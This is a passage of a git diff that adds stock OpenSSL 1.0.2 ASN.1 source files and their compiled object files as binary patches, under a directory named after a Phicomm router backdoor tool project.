+    case V_ASN1_BIT_STRING:
+        ret = asn1_print_obstring_ctx(out, str, indent, pctx);
+        needlf = 0;
+        break;
+
+    case V_ASN1_SEQUENCE:
+    case V_ASN1_SET:
+    case V_ASN1_OTHER:
+        if (BIO_puts(out, "\n") <= 0)
+            return 0;
+        if (ASN1_parse_dump(out, str->data, str->length, indent, 0) <= 0)
+            ret = 0;
+        needlf = 0;
+        break;
+
+    default:
+        ret = ASN1_STRING_print_ex(out, str, pctx->str_flags);
+
+    }
+    if (!ret)
+        return 0;
+    if (needlf && BIO_puts(out, "\n") <= 0)
+        return 0;
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_prn.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_prn.o
new file mode 100644
index 0000000000000000000000000000000000000000..b6d2c942c2eb7160842b4a9b28dda43f28bbcece
GIT binary patch
literal 10872
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_typ.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_typ.c
new file mode 100644
index 0000000..740e86d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_typ.c
@@ -0,0 +1,149 @@
+/* tasn_typ.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+#include <stdio.h>
+#include <openssl/asn1.h>
+#include <openssl/asn1t.h>
+
+/* Declarations for string types */
+
+
+IMPLEMENT_ASN1_TYPE(ASN1_INTEGER)
+IMPLEMENT_ASN1_FUNCTIONS(ASN1_INTEGER)
+
+IMPLEMENT_ASN1_TYPE(ASN1_ENUMERATED)
+IMPLEMENT_ASN1_FUNCTIONS(ASN1_ENUMERATED)
+
+IMPLEMENT_ASN1_TYPE(ASN1_BIT_STRING)
+IMPLEMENT_ASN1_FUNCTIONS(ASN1_BIT_STRING)
+
+IMPLEMENT_ASN1_TYPE(ASN1_OCTET_STRING)
+IMPLEMENT_ASN1_FUNCTIONS(ASN1_OCTET_STRING)
+
+IMPLEMENT_ASN1_TYPE(ASN1_NULL)
+IMPLEMENT_ASN1_FUNCTIONS(ASN1_NULL)
+
+IMPLEMENT_ASN1_TYPE(ASN1_OBJECT)
+
+IMPLEMENT_ASN1_TYPE(ASN1_UTF8STRING)
+IMPLEMENT_ASN1_FUNCTIONS(ASN1_UTF8STRING)
+
+IMPLEMENT_ASN1_TYPE(ASN1_PRINTABLESTRING)
+IMPLEMENT_ASN1_FUNCTIONS(ASN1_PRINTABLESTRING)
+
+IMPLEMENT_ASN1_TYPE(ASN1_T61STRING)
+IMPLEMENT_ASN1_FUNCTIONS(ASN1_T61STRING)
+
+IMPLEMENT_ASN1_TYPE(ASN1_IA5STRING)
+IMPLEMENT_ASN1_FUNCTIONS(ASN1_IA5STRING)
+
+IMPLEMENT_ASN1_TYPE(ASN1_GENERALSTRING)
+IMPLEMENT_ASN1_FUNCTIONS(ASN1_GENERALSTRING)
+
+IMPLEMENT_ASN1_TYPE(ASN1_UTCTIME)
+IMPLEMENT_ASN1_FUNCTIONS(ASN1_UTCTIME)
+
+IMPLEMENT_ASN1_TYPE(ASN1_GENERALIZEDTIME)
+IMPLEMENT_ASN1_FUNCTIONS(ASN1_GENERALIZEDTIME)
+
+IMPLEMENT_ASN1_TYPE(ASN1_VISIBLESTRING)
+IMPLEMENT_ASN1_FUNCTIONS(ASN1_VISIBLESTRING)
+
+IMPLEMENT_ASN1_TYPE(ASN1_UNIVERSALSTRING)
+IMPLEMENT_ASN1_FUNCTIONS(ASN1_UNIVERSALSTRING)
+
+IMPLEMENT_ASN1_TYPE(ASN1_BMPSTRING)
+IMPLEMENT_ASN1_FUNCTIONS(ASN1_BMPSTRING)
+
+IMPLEMENT_ASN1_TYPE(ASN1_ANY)
+
+/* Just swallow an ASN1_SEQUENCE in an ASN1_STRING */
+IMPLEMENT_ASN1_TYPE(ASN1_SEQUENCE)
+
+IMPLEMENT_ASN1_FUNCTIONS_fname(ASN1_TYPE, ASN1_ANY, ASN1_TYPE)
+
+/* Multistring types */
+
+IMPLEMENT_ASN1_MSTRING(ASN1_PRINTABLE, B_ASN1_PRINTABLE)
+IMPLEMENT_ASN1_FUNCTIONS_name(ASN1_STRING, ASN1_PRINTABLE)
+
+IMPLEMENT_ASN1_MSTRING(DISPLAYTEXT, B_ASN1_DISPLAYTEXT)
+IMPLEMENT_ASN1_FUNCTIONS_name(ASN1_STRING, DISPLAYTEXT)
+
+IMPLEMENT_ASN1_MSTRING(DIRECTORYSTRING, B_ASN1_DIRECTORYSTRING)
+IMPLEMENT_ASN1_FUNCTIONS_name(ASN1_STRING, DIRECTORYSTRING)
+
+/* Three separate BOOLEAN type: normal, DEFAULT TRUE and DEFAULT FALSE */
+IMPLEMENT_ASN1_TYPE_ex(ASN1_BOOLEAN, ASN1_BOOLEAN, -1)
+IMPLEMENT_ASN1_TYPE_ex(ASN1_TBOOLEAN, ASN1_BOOLEAN, 1)
+IMPLEMENT_ASN1_TYPE_ex(ASN1_FBOOLEAN, ASN1_BOOLEAN, 0)
+
+/* Special, OCTET STRING with indefinite length constructed support */
+
+IMPLEMENT_ASN1_TYPE_ex(ASN1_OCTET_STRING_NDEF, ASN1_OCTET_STRING, ASN1_TFLG_NDEF)
+
+ASN1_ITEM_TEMPLATE(ASN1_SEQUENCE_ANY) =
+        ASN1_EX_TEMPLATE_TYPE(ASN1_TFLG_SEQUENCE_OF, 0, ASN1_SEQUENCE_ANY, ASN1_ANY)
+ASN1_ITEM_TEMPLATE_END(ASN1_SEQUENCE_ANY)
+
+ASN1_ITEM_TEMPLATE(ASN1_SET_ANY) =
+        ASN1_EX_TEMPLATE_TYPE(ASN1_TFLG_SET_OF, 0, ASN1_SET_ANY, ASN1_ANY)
+ASN1_ITEM_TEMPLATE_END(ASN1_SET_ANY)
+
+IMPLEMENT_ASN1_ENCODE_FUNCTIONS_const_fname(ASN1_SEQUENCE_ANY, ASN1_SEQUENCE_ANY, ASN1_SEQUENCE_ANY)
+IMPLEMENT_ASN1_ENCODE_FUNCTIONS_const_fname(ASN1_SEQUENCE_ANY, ASN1_SET_ANY, ASN1_SET_ANY)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_typ.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_typ.o
new file mode 100644
index 0000000000000000000000000000000000000000..650836120ff277d3bb9898749f40ebf42f452223
GIT binary patch
literal 18320
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
F|G)YBR=EHG

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_utl.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_utl.c
new file mode 100644
index 0000000..41726d8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_utl.c
@@ -0,0 +1,275 @@
+/* tasn_utl.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000-2004 The OpenSSL Project.  All rights reserved.
